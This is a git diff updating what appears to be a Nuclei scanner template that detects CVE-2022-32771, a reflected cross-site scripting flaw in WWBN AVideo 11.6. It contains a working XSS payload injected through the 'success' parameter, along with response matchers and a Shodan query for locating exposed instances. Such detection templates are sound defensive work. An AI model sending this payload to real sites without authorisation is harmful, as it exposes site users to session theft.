Update CVE-2022-32771.yaml
parent
aace6607f7
commit
bd340395f0
|
@ -1,32 +1,40 @@
|
||||||
id: CVE-2022-32771
|
id: CVE-2022-32771
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WWBN AVideo 11.6 - Reflected Cross Site Scripting
|
name: WWBN AVideo 11.6 - Cross Site Scripting
|
||||||
author: arafatansari
|
author: arafatansari
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
|
A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
|
||||||
reference:
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32771
|
|
||||||
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
|
|
||||||
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32771
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2022-32771
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.html:"AVideo"
|
shodan-query: http.html:"AVideo"
|
||||||
verified: "true"
|
tags: cve,cve2022,avideo,xss
|
||||||
tags: xss,cve,2022, avideo,wwbn
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /index.php?success=</script><script>alert(document.cookie);</script> HTTP/1.1
|
- "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
|
||||||
Host: {{Hostname}}
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
|
||||||
|
- 'text: "</script><script>alert(document.cookie);</script>'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- '<script>alert(document.cookie);</script>'
|
|
||||||
|
|
Loading…
Reference in New Issue